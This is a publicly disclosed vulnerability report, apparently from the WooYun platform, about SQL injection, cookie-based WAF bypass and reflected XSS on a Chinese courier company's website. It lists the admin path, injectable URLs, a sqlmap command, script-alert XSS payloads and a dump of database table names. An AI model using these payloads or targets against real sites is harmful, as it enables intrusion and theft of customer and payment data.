漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:运通(中港)速运主站漏洞打包(SQL/XSS/WAF绕过)可导致众多邮件信息泄露
提交时间:2015-10-04 10:03
修复时间:2015-11-18 10:04
公开时间:2015-11-18 10:04
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
无
漏洞详情 披露状态:
2015-10-04: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-18: 厂商已经主动忽略漏洞,细节向公众公开
简要描述: 运通(中港)速运主站漏洞打包(SQL,XSS,防火墙绕过)
详细说明: 【网站架构分析】: 主站采用了Access数据库(存储主站页面信息)和Oracle数据库(存储邮件等账户信息) web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP 【后台地址】: http://www.ytkd168.com/root/ 【普通注入点】: http://www.ytkd168.com/Service_search.asp?keyword=88952634&Submit=%26nbsp%3B%26nbsp%3B%26nbsp%3B%26nbsp%3B%EF%BF%BD%EF%BF%BD%D1%AF&select=all http://www.ytkd168.com/Query.asp?ID=%27%0D%0A&button=%26%23160%3B%26%23160%3B%26%23160%3B%26%23160%3B%B2%E9+%D1%AF 第二个注入点 可get可POST,手工测试直接输入' 页面下方报错
OraOLEDB 错误 '80004005' ORA-01756: 引号内的字符串没有正确结束 /Query.asp,行 260
sqlmap截图:
【当前数据库】:OREAD 【防火墙绕过进行注入及XSS】 说是防火墙绕过,只能说是防火软件做的太简单了。。。 SQL注入直接cookie绕过,XSS“防不胜防” 举例: 【cookie注入】: http://www.ytkd168.com/ShowNews.asp?id=517 手工测试,服务器返回禁止信息,常见的cookie绕过技巧 sqlmap语句:
sqlmap.py -u "http://www.ytkd168.com/ShowNews.asp" --cookie"id=517"--level 2
sqlmap截图:
【XSS】: http://www.ytkd168.com/feedback.asp?type=%D3%A6%C6%B8&zw=%20%27%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E%3C%22 这个毫无防范 http://www.ytkd168.com/?button=%27%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E%3C%22 这个虽然第一次被拦截 页面跳转后仍然触发
漏洞证明: YT数据库信息
Database: YT [175 tables] +---------------------------- | PLAN_TABLE | TAB_AIRLINE_AGENT | TAB_ARBITRATION | TAB_AREA | TAB_AREA_DETAIL | TAB_AUTO_UPDATE | TAB_AUTO_UPDATE_CONFIG | TAB_AUTO_UPDATE_LOG | TAB_AUTO_UPDATE_PDA | TAB_BALANCE_ACCOUNT | TAB_BALANCE_ACCOUNT1 | TAB_BALANCE_ACCOUNT_EMP | TAB_BALANCE_DETAIL | TAB_BALANCE_DETAIL1 | TAB_BALANCE_DETAIL_EMP | TAB_BALANCE_FEE | TAB_BALANCE_FEE_EMP | TAB_BALANCE_TYPE | TAB_BALANCE_TYPE1 | TAB_BALANCE_TYPE_EMP | TAB_BIG_GOODS | TAB_BILL | TAB_BILLLS | TAB_BILL_PDA | TAB_BILL_PROVIDE | TAB_BILL_STATE | TAB_BILL_STATUS | TAB_BILL_STATUS_SUMMARY | TAB_BILL_SUB | TAB_BILL_TEMP | TAB_CALC_SERVER_SQL | TAB_CALC_SQL | TAB_CALC_SQL_TEST | TAB_CFT_CODE | TAB_CIRCUITRY_FEE | TAB_CITY | TAB_CLASS | TAB_CLIENT_SET | TAB_COLLECT_SCAN1 | TAB_COLLECT_SCAN2 | TAB_COMPANY_TYPE | TAB_CONFIRM_SITE | TAB_COUNTY | TAB_CUSTOMER | TAB_CUSTOMER_DISP | TAB_DEPT | TAB_DESTINATION | TAB_DISPATCH_MODE | TAB_EMPLOYEE | TAB_ERROR_FLAG | TAB_EXCEPTION | TAB_EXCEPTION_TYPE | TAB_FAST_TYPE | TAB_FILE_CHECK | TAB_FINANCE_DETAIL | TAB_FINEPAY_TYPE | TAB_FINE_REGISTER | TAB_FORM | TAB_GATHERING | TAB_GLOBAL_CDS | TAB_GOODS | TAB_GOODSBILL | TAB_GOODSBILL_STATE | TAB_GOODSHEDGING | TAB_GOODS_TYPE | TAB_HINT | TAB_INVOICE_INFORMATION | TAB_INVOICE_TYPE | TAB_K8_REBOOT_MSG | TAB_K8_REBOOT_MSG_DETAIL | TAB_LIMIT_MODIFY | TAB_LOGIN_LOG | TAB_M8_CONFIG | TAB_M8_LOGINLOG | TAB_M8_USELOG | TAB_MENUS | TAB_MENUS_GET | TAB_MESSAGES | TAB_MESSAGES_MONEY | TAB_MESSAGES_MONEY_DETAIL | TAB_MODIFY | TAB_MODIFY_TABLE_NAME | TAB_NOTICE | TAB_NOTICE_SEE | TAB_OTHER_ERROR | TAB_PAY_MODE | TAB_PAY_SIDE | TAB_PDA_CLASS | TAB_PDA_EMPLOYEE | TAB_PDA_EMPLOYEE_SCANTYPE | TAB_PDA_MENUS | TAB_PDA_POPEDOM | TAB_PDA_PROBLEM_TYPE | TAB_PDA_SITE | TAB_PDA_UPDATE | TAB_PENALTY | TAB_PIC_COMPUTER | TAB_PIC_SCAN | TAB_POSLOGIN_LOG | TAB_PROBLEM | TAB_PROBLEM_SEND | TAB_PROBLEM_TRACE | TAB_PROBLEM_TYPE | TAB_PROVINCE | TAB_QUERY_RECOUD | TAB_QUOTE_AREA | TAB_QUOTE_DIS_AREA | TAB_QUOTE_EXPRESSION | TAB_QUOTE_MODEL | TAB_QUOTE_PRICE | TAB_RANGE | TAB_RESOURCE_ADDRESS | TAB_RETURNBILL | TAB_SCANFIELD_CONFIG | TAB_SCANTYPE_CONFIG | TAB_SCAN_BILL | TAB_SCAN_COME | TAB_SCAN_DELETE | TAB_SCAN_DISP | TAB_SCAN_GPRS | TAB_SCAN_OTHER | TAB_SCAN_PDA1 | TAB_SCAN_REC | TAB_SCAN_SEND | TAB_SCAN_TYPE | TAB_SEND_GOODS_BALANCE | TAB_SERVER_CONFIG | TAB_SHARE_SET | TAB_SIGN | TAB_SIGN_DELETE | TAB_SIGN_OUT | TAB_SIGN_RATE | TAB_SIGN_TIME | TAB_SITE | TAB_SITE_EXCEPTION | TAB_SITE_EXCEPTION_PROVIDE | TAB_SITE_OPEN | TAB_SITE_TRUCK_WAY | TAB_SQLITE_UPDATE | TAB_STOCK | TAB_STOCK_DETAIL_BALANCE | TAB_STOCK_GOODS_NAME | TAB_STOCK_INOUT_DETAIL | TAB_STOCK_INOUT_DETAIL_NEW | TAB_STOCK_NEW | TAB_SUPPLIER | TAB_SYNC_ADJUST | TAB_SYNC_B | TAB_SYNC_ERR | TAB_SYNC_J | TAB_SYNC_LOG | TAB_SYNC_P | TAB_SYNC_YTB | TAB_SYNC_ZTD | TAB_TAOBAO_BILL | TAB_TAOBAO_BILL_ITEMS | TAB_TAOBAO_SITE | TAB_TOPAY_RADIO | TAB_TRUCK | TAB_TRUCK_MANAGE | TAB_TRUCK_WAY | TAB_UNIT_NUMBER | TAB_USER | TAB_USER_POPEDOM | TAB_USER_POPEDOM1 | TAB_WEIGHT_SCOPE | TAB_ZFB_ACCOUNT | TAB_ZFB_APPLY | TAB_ZFB_CODE | TAB_ZFB_CZ | TAB_ZFB_HANDMADE | TAB_ZFB_PARAM | TAB_ZFB_PLFK | TAB_ZFB_SITE | T_CURRENCY
修复方案: 版权声明:转载请注明来源 路人甲 @乌云
漏洞回应 厂商回应: 未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
漏洞评价:
评论